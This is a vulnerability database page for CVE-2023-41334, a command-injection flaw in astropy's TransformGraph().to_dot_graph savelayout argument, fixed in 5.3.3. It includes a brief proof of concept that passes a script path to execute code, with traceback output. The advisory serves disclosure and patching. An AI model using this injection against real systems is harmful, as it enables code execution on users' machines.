Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-h2x6-5jx5-46hf

Опубликовано: 18 мар. 2024
Источник: github
Github: Прошло ревью
CVSS3: 8.4

Описание

RCE in TranformGraph().to_dot_graph function

Summary

RCE due to improper input validation in TranformGraph().to_dot_graph function

Details

Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen. https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539 Although an error will be raised, the command or script will be executed successfully.

PoC

$ cat /tmp/script #!/bin/bash echo astrorce > /tmp/poc.txt
$ python3 Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from astropy.coordinates.transformations import TransformGraph >>> tg = TransformGraph() >>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script") Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph stdout, stderr = proc.communicate(dotgraph) File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate stdout, stderr = self._communicate(input, endtime, timeout) File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate input_view = memoryview(self._input) TypeError: memoryview: a bytes-like object is required, not 'str' >>>
$ cat /tmp/poc.txt astrorce

Impact

code execution on the user's machine

Ссылки

Пакеты

Наименование

astropy

pip
Затронутые версииВерсия исправления

< 5.3.3

5.3.3

EPSS

Процентиль: 85%
0.02432
Низкий

8.4 High

CVSS3

CVE ID

CVE-2023-41334

Дефекты

CWE-74
CWE-77

Связанные уязвимости

ubuntu логотип

CVE-2023-41334

CVSS3: 8.4
ubuntu
почти 2 года назад

Astropy is a project for astronomy in Python that fosters interoperability between Python astronomy packages. Version 5.3.2 of the Astropy core package is vulnerable to remote code execution due to improper input validation in the `TranformGraph().to_dot_graph` function. A malicious user can provide a command or a script file as a value to the `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. Although an error will be raised, the command or script will be executed successfully. Version 5.3.3 fixes this issue.

nvd логотип

CVE-2023-41334

CVSS3: 8.4
nvd
почти 2 года назад

Astropy is a project for astronomy in Python that fosters interoperability between Python astronomy packages. Version 5.3.2 of the Astropy core package is vulnerable to remote code execution due to improper input validation in the `TranformGraph().to_dot_graph` function. A malicious user can provide a command or a script file as a value to the `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. Although an error will be raised, the command or script will be executed successfully. Version 5.3.3 fixes this issue.

debian логотип

CVE-2023-41334

CVSS3: 8.4
debian
почти 2 года назад

Astropy is a project for astronomy in Python that fosters interoperabi ...

EPSS

Процентиль: 85%
0.02432
Низкий

8.4 High

CVSS3

CVE ID

CVE-2023-41334

Дефекты

CWE-74
CWE-77